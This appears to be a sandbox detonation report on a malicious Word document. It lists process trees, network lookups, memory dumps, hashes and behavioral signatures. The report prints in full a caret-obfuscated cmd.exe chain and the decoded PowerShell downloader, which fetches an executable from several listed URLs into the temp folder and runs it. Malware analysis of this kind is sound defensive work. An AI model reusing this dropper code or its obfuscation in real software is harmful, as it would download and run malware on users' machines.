mO^H^a=^b&&^se^t N^2^o=^h^e^l&&s^e^t s^b^9=^://^t^h&&^s^e^t ^h^3R=^s&&^se^t ^HXI='^,$^m&&^se^t ^tR^G^7=^en&&s^e^t V^d^l=^P&&^se^t ^w^K^0=^Hv&&^s^e^t ^t3=r&&s^e^t 4iY^2=^j^i^W&&^se^t a^O=^.i&&s^e^t 2^e=Rt^d)^{&&s^e^t RXV=^-c&&^s^e^t ^urM^o=f&&^se^t ^0QM^g=^o&&^s^e^t D^Y=w-^O^b^j&&s^e^t O^tz^Z=)&&^se^t ^qp^k=1&&^s^e^t l^T^b^p=ro&&s^et ^Tt^eJ=^t&&^s^et ^h^ijC=^h&&^s^e^t ^2Fh^Z=^'^@'&&s^e^t ^M^5=^i&&s^e^t Z^t=^p&&^s^et ^A^Y^k=(&&s^e^t ^M^hW=(&&s^e^t ^z^P=i^t^e(^$&&s^e^t ^P^G^T=^Y&&^se^t ^29=^b&&^s^et 4d^p=^W&&^s^et ^b^Uc=Hv&&^s^e^t M^w^l=;^b&&^se^t m^h^E=^P&&^s^et sp^5^K=^3C&&^s^et ^h3=^m&&^se^t ^h^a4^z=^x&&^s^et ^AG^J=^t&&s^e^t ^OE^Z=^t&&^s^e^t c^0=)^+'\n&&s^e^t ^ia=^e&&^se^t C^0^z^M=t^h(&&^s^e^t ^B^6cR=^G&&^s^e^t ^s^H^K^l=^I^O&&s^e^t C^s^Y=^$w&&^se^t r^HG^2=n&&^s^e^t ^LC=//^fas^h^i&&^s^e^t ^hs^g^5=^ &&s^e^t ^i^G^Q=c^a^tc&&s^e^t ^Wa=^t&&s^e^t ^zl=m^ ^'&&se^t ^0^xA=^jW^b^.re&&^s^e^t R^g^F^8=^.e&&^se^t ^wLV=y&&^s^e^t ^5^q=^.^l&&s^e^t ^0^TS^G=^w&&set ^s^p=^=&&^se^t ^Zn^6^a=^u&&s^e^t ^d^UN^z=^e&&^s^et ^p^bx=^.&&s^e^t ^5n^zy=^S&&^se^t P^YV=^e&&^se^t Z^7^6=^o&&^s^et H^Z=vur/&&s^e^t c^w^5=^m'^;&&^s^et ^0^xvt=^y&&^s^e^t u^E=^pe&&s^e^t ^H^P^o=$^d&&s^e^t ^W^EJN=^p://^o&&^se^t ^utX^l=8^Y&&s^e^t ^4^2^kn=.&&^s^et ^An7^8=^a&&^s^et ^2j=^$^j&&^s^e^t ^Z7^LH=^o&&^s^et c^D^PA=^'^ad&&s^e^t ^0^Ka=^K^t&&^s^e^t ^D1e^o=^t&&^s^et ^5qr=^p&&^se^t ^Am=^.&&^s^et ^A^8=^f&&^s^e^t ^Wu^h=^$^d^P&&^se^t pVG=^$&&^se^t ^3y^E=^.&&^se^t ^Q^kW=r&&^se^t CE^7^h=^s&&^se^t ^7V^Y^A=d^b^.s&&^s^et C^Db^Q=^ &&^se^t r^Y=^T&&^s^e^t ^wP^J=^ &&^se^t b^h=^e&&^s^e^t ^3C=r^s&&s^e^t ^8f=^b^d&&s^e^t ^i^qyU=^D^h^P&&^s^et ^Q1=c&&^s^et ^P^oc0=^.o&&s^e^t VtcG=Pr^oces&&^s^e^t ^4z^J=c^o&&s^e^t T^6=)^;&&s^e^t ^I^u6=c&&^se^t V^Lh^p=]^:^:&&^s^e^t q^3^Fv=^g&&^s^et C5z=^k&&^se^t nVc=^ &&^s^e^t ^0v=^tar&&^se^t ^d^q^9=^f^or&&^se^t t^6^UT=^i&&^se^t ^LW^a^p=^W&&s^e^t ^hln^D=^b^j^e&&set ^H^s2^8=l^it(&&^se^t V^J^ic=)^;^S&&^set r^l=/C&&^s^et ^O^PgC=c&&^se^t ^w^Q^TO=^t&&^s^e^t ^3yQ^o=^e(&&^s^e^t ^SF=c^i&&^s^e^t V^X=^ &&s^e^t b^e^f^U=^;&&s^e^t ^bp^1^e=^-&&^se^t HT^m^o=^t&&^s^et ^L^1=/&&se^t ^B^p=/&&^s^e^t r^w^px=^i^l&&^s^e^t ^wP^k=^m/&&^s^et ^zn=^a&&^s^e^t ^2H^qc=^$^j^i&&^s^e^t ^sW^y=.^op^en&&^s^e^t v^h=;^$R^t^d&&^s^e^t ^z^mc=^f&&s^e^t ^pI^ST=^dh&&s^e^t ^S^y^a=^W=([^S^y^s^te&&s^e^t ^T^6c^M=^x^m^l^2&&^s^e^t B^h^S^2=)^;&&^s^et ^zC^w=tr&&^se^t 2Np=^ &&^s^et ^Loj^q=^on^an&&^se^t ^B^8^Y^I=^t&&s^e^t T^K=^B^o^d&&^s^e^t N^w=^P^a^t&&^se^t r^F=^y&&^se^t r^I^i=s^e&&c^a^ll s^e^t hRUc=%N^x%%C^8^f%%^3C%%N^2^o%%N^H%%^B^DI^J%%C^s^Y%%^Sp^D%%b^HA^L%%^DP^FZ%%^QR%%^op^k%%v^h%%^s^p%%^3^J^A%%a^7^m%%^w^Q^TO%%^OE^Z%%Z^t%%s^b^9%%t^6^UT%%3^Z%%RVNp%%^SF%%^D1e^o%%^uK^O^b%%^wP^k%%^P^G^T%%^qN%%sp^5^K%%^I^k^qV%%NrVj%%^LC%%^Loj^q%%^pI^ST%%^Z7^LH%%a^oe^D%%^T^Q%%^AG^J%%r^F%%n^3%%^4z^J%%n^W^L%%^B^8^Y^I%%^0^xvt%%^uj^P%%^5^p^7%%H^Z%%^4r^G%%^I^1v%%^7^9D%%^LC^S%%i^m%%^p^Y^o^D%%^dq^z%%^z^d%%^L^k^2^K%%u^3^0%%n^9%%lN%%^0m%%^S^o^3%%mS^j^o%%q^3^Fv%%l^T^b^p%%^Zn^6^a%%u^o^4%%^8f%%^3y^E%%pCV%%n^tR%%UnN%%^P^Uu%%^DT^LR%%^27%%^AHl4%%^t^y%%^L^1%%^B^p%%^M^5%%^I^u6%%v^d^uH%%^Q^kW%%HT^m^o%%^5^q%%C5z%%r^l%%^W^wf%%^i^qyU%%L^s%%r^a%%cb1%%^W^EJN%%CE^7^h%%^An7^8%%^S^s%%^8^PW%%^q^UGd%%a^O%%s^z^O%%^utX^l%%^qp^k%%^Q4%%^5n^zy%%^U^H%%^H^s2^8%%^2Fh^Z%%T^6%%^2H^qc%%^S^y^a%%^ZN^UW%%^4^2^kn%%^s^H^K^l%%D^d^5%%N^w%%^h^ijC%%V^Lh^p%%wtN%%^dw9%%c^9^M%%^5qr%%V^d^l%%^zn%%C^0^z^M%%c^0%%^0^Ka%%R^g^F^8%%^h^a4^z%%^Dci^4%%B^h^S^2%%^2j%%4d^p%%^29%%V^X%%s^8%%C^k^4%%D^Y%%b^h%%^O^PgC%%^Tt^eJ%%nVc%%RXV%%Z^7^6%%^zl%%^B^Q%%^T^6c^M%%^Am%%^l^T^4%%Q^LT^y%%^3^g^W^1%%^Snj^k%%m^h^E%%^A^8%%O^z%%^h^k%%P^YV%%^0^TS^G%%^bp^1^e%%R^sc^D%%^hln^D%%^Q1%%^Wa%%C^Db^Q%%^I^t^Z%%^0QM^g%%W^L^e%%c^D^PA%%^UM%%^7V^Y^A%%V^M%%O8r^q%%c^w^5%%^d^q^9%%^d^UN^z%%5^t%%M^g^o%%^Z^E^Xk%%^h3%%^b^Uc%%^8^0v%%^a^erZ%%r^HG^2%%^wP^J%%pVG%%2^e%%^zC^w%%0^p%%^5^P^o%%^sW^y%%^M^hW%%^I^aJ%%^B^6cR%%v^8^5%%r^Y%%^HXI%%^w^K^0%%nV^m^z%%^S^xLC%%3S^B^M%%^PI^3%%mO^H^a%%^p^bx%%^t^L^j%%^tR^G^7%%^Bnr%%^d^Z%%^7I^d%%^P^oc0%%u^E%%^S^i^t%%^A^Y^k%%O^tz^Z%%b^e^f^U%%^H^P^o%%R^Gv^Q%%^urM^o%%^SR%%^ia%%^4^hy%%w^S^E%%^D0%%^Wu^h%%U^y%%^3^x%%^z^P%%^0^xA%%^h^3R%%^2^H%%^h^a%%r^I^i%%T^K%%^wLV%%A^I^ET%%^Ms^p^h%%^5H^Mw%%^3^ZdR%%^sE^K^p%%^Il^M^q%%A^0Z^L%%4^U^D^8%%^z^mc%%r^w^px%%^3yQ^o%%p^d^W%%4iY^2%%V^J^ic%%^0v%%B^g%%^3^zcn%%VtcG%%^8^1^X%%^L^Dt%%^LW^a^p%%M^w^l%%^t3%%nR^l%%q^0^k%%^i^G^Q%%t^l%%^z^l^p%%2Np%%^4f^o%%^b^T%%^Ur^Lz%%^hs^g^5%%^oe^Z^J%%^P^D%&&c^a^ll %hRUc%"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell $wvt='ZRS';$Rtd='http://thienuyscit.com/Y6Kp3Cv@http://fashionandhomestyle.com/tyoinvur/wtuds/3HjqiOIHre@http://bnsgroupbd.com/KPGAeXAeEc@http://icart.lk/C5YbDhP@http://osadchy.co.il/8Y1DRnG'.Split('@');$jiW=([System.IO.Path]::GetTempPath()+'\nKt.exe');$jWb =New-Object -com 'msxml2.xmlhttp';$dPf = New-Object -com 'adodb.stream';foreach($mHv in $Rtd){try{$jWb.open('GET',$mHv,0);$jWb.send();$dPf.open();$dPf.type = 1;$dPf.write($jWb.responseBody);$dPf.savetofile($jiW);Start-Process $jiW;break}catch{}}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | thienuyscit.com | udp |
| US | 8.8.8.8:53 | fashionandhomestyle.com | udp |
| US | 160.153.0.79:80 | fashionandhomestyle.com | tcp |
| US | 8.8.8.8:53 | bnsgroupbd.com | udp |
| US | 173.236.95.18:80 | bnsgroupbd.com | tcp |
| US | 8.8.8.8:53 | icart.lk | udp |
| US | 8.8.8.8:53 | osadchy.co.il | udp |
Files
memory/2976-0-0x000000002F021000-0x000000002F022000-memory.dmp
memory/2976-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2976-2-0x000000007160D000-0x0000000071618000-memory.dmp
memory/2976-7-0x0000000000620000-0x0000000000720000-memory.dmp
memory/2976-8-0x0000000000620000-0x0000000000720000-memory.dmp
memory/2976-9-0x0000000000620000-0x0000000000720000-memory.dmp
memory/2976-10-0x0000000000620000-0x0000000000720000-memory.dmp
memory/2976-13-0x0000000000620000-0x0000000000720000-memory.dmp
memory/2976-12-0x0000000000620000-0x0000000000720000-memory.dmp
memory/2976-11-0x0000000000620000-0x0000000000720000-memory.dmp
memory/2976-6-0x0000000000620000-0x0000000000720000-memory.dmp
memory/2616-21-0x00000000056C0000-0x000000000571B000-memory.dmp
memory/2616-22-0x00000000064B0000-0x00000000065E3000-memory.dmp
memory/2976-26-0x000000007160D000-0x0000000071618000-memory.dmp
memory/2976-27-0x0000000000620000-0x0000000000720000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
| MD5 | 5f61eef627555bd85cf7ee047b8fb0fd |
| SHA1 | dca3a760aacac5da474cc5c43612d88bb5e6625f |
| SHA256 | 21ed6672082f3dfaac8ea53db4825fcd38c1d9f5cd9501c1599772fb3be8b827 |
| SHA512 | d852acfa7aed9f71efff9c088979a4bb198cf9b39f1888068939d778e4ed8bd687abed39a46d168f5dabfdd1ca8d2ec54a248f529f703558af1854ba29443891 |
memory/2976-42-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2976-43-0x000000007160D000-0x0000000071618000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-26 05:39
Reported
2024-05-26 05:41
Platform
win10v2004-20240226-en
Max time kernel
142s
Max time network
148s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\System32\cmd.exe | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4972 wrote to memory of 1732 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\System32\cmd.exe |
| PID 4972 wrote to memory of 1732 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\System32\cmd.exe |
| PID 1732 wrote to memory of 4476 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1732 wrote to memory of 4476 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\747c9d7f8042899383819dbfa708255b_JaffaCakes118.doc" /o ""
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C"s^et ^PI^3=^W&&^s^e^t ^ZN^UW=^m&&^se^t ^dq^z=^iO^I&&^se^t ^5H^Mw=^$&&s^e^t ^h^a=n&&^se^t mS^j^o=n^s&&s^e^t O8r^q=e^a&&^se^t u^o^4=^p&&s^e^t ^h^k=N&&^s^et NrVj=@h^t^tp^:&&^se^t ^Snj^k=^d&&^se^t ^oe^Z^J= ^ ^ ^ &&^se^t q^0^k=^ak^}&&s^e^t N^H=^l&&^set B^g=^t&&^s^e^t ^AHl4=h^t^t&&^set ^z^d=^Hr^e&&^s^et ^P^Uu=^G^A&&^s^et ^4r^G=w^t&&s^e^t 5^t=^a&&^s^et nV^m^z=^,&&^se^t ^8^0v=^ &&^se^t ^DP^FZ=^'&&^s^e^t ^QR=ZRS&&s^e^t pCV=c&&^s^e^t ^UM=^o&&s^e^t L^s=^@^h&&^s^et ^z^l^p=}^ &&^s^e^t O^z=^ ^= &&^s^et ^3^ZdR=^d&&^se^t ^L^k^2^K=^@&&^s^e^t ^SR=^.t^y^p&&s^e^t UnN=m/^K^P&&s^e^t ^uj^P=o&&^s^e^t ^L^Dt=^$^j^i&&^s^e^t nR^l=^e&&s^e^t v^8^5=^E&&^s^e^t ^0m=://&&s^e^t ^T^Q=^e^s&&^s^et ^Q4=^DRn^G'^.&&s^e^t s^z^O=^l/&&^s^e^t ^LC^S=^3&&s^e^t ^2^H=^p^o&&^s^e^t ^U^H=^p&&s^e^t 4^U^D^8=^o&&^se^t ^Z^E^Xk=(^$&&^s^et ^7^9D=/&&^s^e^t ^5^P^o=^Wb&&^s^e^t V^M=^tr&&^s^et ^I^1v=u^d^s&&^s^et w^S^E==^ &&s^e^t a^7^m=^h&&set ^I^t^Z=^-c&&^se^t cb1=^t&&s^e^t ^3^J^A=^'&&^s^et ^t^y=^p:&&^s^et s^8=^=N&&s^e^t N^x=^p^ow&&s^e^t ^t^L^j=^s&&^se^t D^d^5=^.&&^se^t t^l=^h^{^}&&s^e^t ^S^xLC=^0)^;&&s^e^t ^7I^d=^$^d^P^f&&^s^et ^d^Z=()^;&&^s^et ^b^T= ^ &&^s^et ^4^hy=^ &&^s^et A^I^ET=)&&^se^t ^3^zcn=^-&&^se^t ^8^1^X=^s &&^s^et ^4f^o=^ &&^s^e^t ^a^erZ=^i&&^se^t v^d^uH=^a&&s^et ^8^PW=c^h^y&&^s^et ^sE^K^p=^P&&^se^t ^B^Q=m^s&&s^e^t n^9=t&&^s^et ^Ms^p^h=^;&&^s^e^t U^y=^f&&^s^e^t u^3^0=^ht&&s^e^t ^I^aJ=^'&&s^e^t 0^p=y{^$^j&&^s^e^t ^S^o^3=^b&&^se^t R^sc^D=^O&&^s^e^t 3^Z=^en^u^y&&^se^t n^3=^l^e^.&&^s^et ^P^D=^ &&^s^e^t ^I^k^qV=v&&^s^et ^op^k=^'&&^set lN=^p&&^s^e^t ^DT^LR=e^X&&^s^et a^oe^D=^m&&^se^t ^p^Y^o^D=^q&&^s^e^t i^m=H^j&&^s^e^t A^0Z^L=av^et&&s^e^t ^3^g^W^1=^;$&&^s^e^t 3S^B^M=^$^j&&^se^t b^HA^L=^=&&^s^et wtN=^G^e&&^se^t Q^LT^y=^l^htt^p^'&&^s^et ^dw9=^t^T^e&&^se^t n^W^L=^m/&&s^e^t c^9^M=^m&&^s^et ^D0=^1^;&&^se^t ^S^s=^d&&^s^et M^g^o=c^h&&^s^et ^3^x=^.^wr&&s^e^t ^W^wf=^5^Y^b&&^s^e^t R^Gv^Q=P&&s^e^t ^Il^M^q=^f.^s&&^s^et ^l^T^4=x^m&&s^e^t ^qN=6^K^p&&s^e^t ^B^DI^J=^ &&^s^et ^q^UGd=.co&&^s^e^t ^Dci^4=^e^'&&^se^t ^5^p^7=^in&&^s^e^t W^L^e=^m^ &&s^e^t C^8^f=^e&&s^e^t ^27=^A^eEc@&&^se^t ^S^i^t=n&&s^e^t ^Ur^Lz=^ &&s^e^t r^a=^t&&^s^et p^d^W=^$&&se^t ^Sp^D=v^t&&^s^et C^k^4=^e&&s^e^t n^tR=^o&&^s^e^t ^Bnr=^d&&s^e^t RVNp=^s&&^s^e^t ^uK^O^b=^.c^o&&^s^et mO^H^a=^b&&^se^t N^2^o=^h^e^l&&s^e^t s^b^9=^://^t^h&&^s^e^t ^h^3R=^s&&^se^t ^HXI='^,$^m&&^se^t ^tR^G^7=^en&&s^e^t V^d^l=^P&&^se^t ^w^K^0=^Hv&&^s^e^t ^t3=r&&s^e^t 4iY^2=^j^i^W&&^se^t a^O=^.i&&s^e^t 2^e=Rt^d)^{&&s^e^t RXV=^-c&&^s^e^t ^urM^o=f&&^se^t ^0QM^g=^o&&^s^e^t D^Y=w-^O^b^j&&s^e^t O^tz^Z=)&&^se^t ^qp^k=1&&^s^e^t l^T^b^p=ro&&s^et ^Tt^eJ=^t&&^s^et ^h^ijC=^h&&^s^e^t ^2Fh^Z=^'^@'&&s^e^t ^M^5=^i&&s^e^t Z^t=^p&&^s^et ^A^Y^k=(&&s^e^t ^M^hW=(&&s^e^t ^z^P=i^t^e(^$&&s^e^t ^P^G^T=^Y&&^se^t ^29=^b&&^s^et 4d^p=^W&&^s^et ^b^Uc=Hv&&^s^e^t M^w^l=;^b&&^se^t m^h^E=^P&&^s^et sp^5^K=^3C&&^s^et ^h3=^m&&^se^t ^h^a4^z=^x&&^s^et ^AG^J=^t&&s^e^t ^OE^Z=^t&&^s^e^t c^0=)^+'\n&&s^e^t ^ia=^e&&^se^t C^0^z^M=t^h(&&^s^e^t ^B^6cR=^G&&^s^e^t ^s^H^K^l=^I^O&&s^e^t C^s^Y=^$w&&^se^t r^HG^2=n&&^s^e^t ^LC=//^fas^h^i&&^s^e^t ^hs^g^5=^ &&s^e^t ^i^G^Q=c^a^tc&&s^e^t ^Wa=^t&&s^e^t ^zl=m^ ^'&&se^t ^0^xA=^jW^b^.re&&^s^e^t R^g^F^8=^.e&&^se^t ^wLV=y&&^s^e^t ^5^q=^.^l&&s^e^t ^0^TS^G=^w&&set ^s^p=^=&&^se^t ^Zn^6^a=^u&&s^e^t ^d^UN^z=^e&&^s^et ^p^bx=^.&&s^e^t ^5n^zy=^S&&^se^t P^YV=^e&&^se^t Z^7^6=^o&&^s^et H^Z=vur/&&s^e^t c^w^5=^m'^;&&^s^et ^0^xvt=^y&&^s^e^t u^E=^pe&&s^e^t ^H^P^o=$^d&&s^e^t ^W^EJN=^p://^o&&^se^t ^utX^l=8^Y&&s^e^t ^4^2^kn=.&&^s^et ^An7^8=^a&&^s^et ^2j=^$^j&&^s^e^t ^Z7^LH=^o&&^s^et c^D^PA=^'^ad&&s^e^t ^0^Ka=^K^t&&^s^e^t ^D1e^o=^t&&^s^et ^5qr=^p&&^se^t ^Am=^.&&^s^et ^A^8=^f&&^s^e^t ^Wu^h=^$^d^P&&^se^t pVG=^$&&^se^t ^3y^E=^.&&^se^t ^Q^kW=r&&^se^t CE^7^h=^s&&^se^t ^7V^Y^A=d^b^.s&&^s^et C^Db^Q=^ &&^se^t r^Y=^T&&^s^e^t ^wP^J=^ &&^se^t b^h=^e&&^s^e^t ^3C=r^s&&s^e^t ^8f=^b^d&&s^e^t ^i^qyU=^D^h^P&&^s^et ^Q1=c&&^s^et ^P^oc0=^.o&&s^e^t VtcG=Pr^oces&&^s^e^t ^4z^J=c^o&&s^e^t T^6=)^;&&s^e^t ^I^u6=c&&^se^t V^Lh^p=]^:^:&&^s^e^t q^3^Fv=^g&&^s^et C5z=^k&&^se^t nVc=^ &&^s^e^t ^0v=^tar&&^se^t ^d^q^9=^f^or&&^se^t t^6^UT=^i&&^se^t ^LW^a^p=^W&&s^e^t ^hln^D=^b^j^e&&set ^H^s2^8=l^it(&&^se^t V^J^ic=)^;^S&&^set r^l=/C&&^s^et ^O^PgC=c&&^se^t ^w^Q^TO=^t&&^s^e^t ^3yQ^o=^e(&&^s^e^t ^SF=c^i&&^s^e^t V^X=^ &&s^e^t b^e^f^U=^;&&s^e^t ^bp^1^e=^-&&^se^t HT^m^o=^t&&^s^et ^L^1=/&&se^t ^B^p=/&&^s^e^t r^w^px=^i^l&&^s^e^t ^wP^k=^m/&&^s^et ^zn=^a&&^s^e^t ^2H^qc=^$^j^i&&^s^e^t ^sW^y=.^op^en&&^s^e^t v^h=;^$R^t^d&&^s^e^t ^z^mc=^f&&s^e^t ^pI^ST=^dh&&s^e^t ^S^y^a=^W=([^S^y^s^te&&s^e^t ^T^6c^M=^x^m^l^2&&^s^e^t B^h^S^2=)^;&&^s^et ^zC^w=tr&&^se^t 2Np=^ &&^s^et ^Loj^q=^on^an&&^se^t ^B^8^Y^I=^t&&s^e^t T^K=^B^o^d&&^s^e^t N^w=^P^a^t&&^se^t r^F=^y&&^se^t r^I^i=s^e&&c^a^ll s^e^t hRUc=%N^x%%C^8^f%%^3C%%N^2^o%%N^H%%^B^DI^J%%C^s^Y%%^Sp^D%%b^HA^L%%^DP^FZ%%^QR%%^op^k%%v^h%%^s^p%%^3^J^A%%a^7^m%%^w^Q^TO%%^OE^Z%%Z^t%%s^b^9%%t^6^UT%%3^Z%%RVNp%%^SF%%^D1e^o%%^uK^O^b%%^wP^k%%^P^G^T%%^qN%%sp^5^K%%^I^k^qV%%NrVj%%^LC%%^Loj^q%%^pI^ST%%^Z7^LH%%a^oe^D%%^T^Q%%^AG^J%%r^F%%n^3%%^4z^J%%n^W^L%%^B^8^Y^I%%^0^xvt%%^uj^P%%^5^p^7%%H^Z%%^4r^G%%^I^1v%%^7^9D%%^LC^S%%i^m%%^p^Y^o^D%%^dq^z%%^z^d%%^L^k^2^K%%u^3^0%%n^9%%lN%%^0m%%^S^o^3%%mS^j^o%%q^3^Fv%%l^T^b^p%%^Zn^6^a%%u^o^4%%^8f%%^3y^E%%pCV%%n^tR%%UnN%%^P^Uu%%^DT^LR%%^27%%^AHl4%%^t^y%%^L^1%%^B^p%%^M^5%%^I^u6%%v^d^uH%%^Q^kW%%HT^m^o%%^5^q%%C5z%%r^l%%^W^wf%%^i^qyU%%L^s%%r^a%%cb1%%^W^EJN%%CE^7^h%%^An7^8%%^S^s%%^8^PW%%^q^UGd%%a^O%%s^z^O%%^utX^l%%^qp^k%%^Q4%%^5n^zy%%^U^H%%^H^s2^8%%^2Fh^Z%%T^6%%^2H^qc%%^S^y^a%%^ZN^UW%%^4^2^kn%%^s^H^K^l%%D^d^5%%N^w%%^h^ijC%%V^Lh^p%%wtN%%^dw9%%c^9^M%%^5qr%%V^d^l%%^zn%%C^0^z^M%%c^0%%^0^Ka%%R^g^F^8%%^h^a4^z%%^Dci^4%%B^h^S^2%%^2j%%4d^p%%^29%%V^X%%s^8%%C^k^4%%D^Y%%b^h%%^O^PgC%%^Tt^eJ%%nVc%%RXV%%Z^7^6%%^zl%%^B^Q%%^T^6c^M%%^Am%%^l^T^4%%Q^LT^y%%^3^g^W^1%%^Snj^k%%m^h^E%%^A^8%%O^z%%^h^k%%P^YV%%^0^TS^G%%^bp^1^e%%R^sc^D%%^hln^D%%^Q1%%^Wa%%C^Db^Q%%^I^t^Z%%^0QM^g%%W^L^e%%c^D^PA%%^UM%%^7V^Y^A%%V^M%%O8r^q%%c^w^5%%^d^q^9%%^d^UN^z%%5^t%%M^g^o%%^Z^E^Xk%%^h3%%^b^Uc%%^8^0v%%^a^erZ%%r^HG^2%%^wP^J%%pVG%%2^e%%^zC^w%%0^p%%^5^P^o%%^sW^y%%^M^hW%%^I^aJ%%^B^6cR%%v^8^5%%r^Y%%^HXI%%^w^K^0%%nV^m^z%%^S^xLC%%3S^B^M%%^PI^3%%mO^H^a%%^p^bx%%^t^L^j%%^tR^G^7%%^Bnr%%^d^Z%%^7I^d%%^P^oc0%%u^E%%^S^i^t%%^A^Y^k%%O^tz^Z%%b^e^f^U%%^H^P^o%%R^Gv^Q%%^urM^o%%^SR%%^ia%%^4^hy%%w^S^E%%^D0%%^Wu^h%%U^y%%^3^x%%^z^P%%^0^xA%%^h^3R%%^2^H%%^h^a%%r^I^i%%T^K%%^wLV%%A^I^ET%%^Ms^p^h%%^5H^Mw%%^3^ZdR%%^sE^K^p%%^Il^M^q%%A^0Z^L%%4^U^D^8%%^z^mc%%r^w^px%%^3yQ^o%%p^d^W%%4iY^2%%V^J^ic%%^0v%%B^g%%^3^zcn%%VtcG%%^8^1^X%%^L^Dt%%^LW^a^p%%M^w^l%%^t3%%nR^l%%q^0^k%%^i^G^Q%%t^l%%^z^l^p%%2Np%%^4f^o%%^b^T%%^Ur^Lz%%^hs^g^5%%^oe^Z^J%%^P^D%&&c^a^ll %hRUc%"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $wvt='ZRS';$Rtd='http://thienuyscit.com/Y6Kp3Cv@http://fashionandhomestyle.com/tyoinvur/wtuds/3HjqiOIHre@http://bnsgroupbd.com/KPGAeXAeEc@http://icart.lk/C5YbDhP@http://osadchy.co.il/8Y1DRnG'.Split('@');$jiW=([System.IO.Path]::GetTempPath()+'\nKt.exe');$jWb =New-Object -com 'msxml2.xmlhttp';$dPf = New-Object -com 'adodb.stream';foreach($mHv in $Rtd){try{$jWb.open('GET',$mHv,0);$jWb.send();$dPf.open();$dPf.type = 1;$dPf.write($jWb.responseBody);$dPf.savetofile($jiW);Start-Process $jiW;break}catch{}}
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4140 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 240.76.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.242.123.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
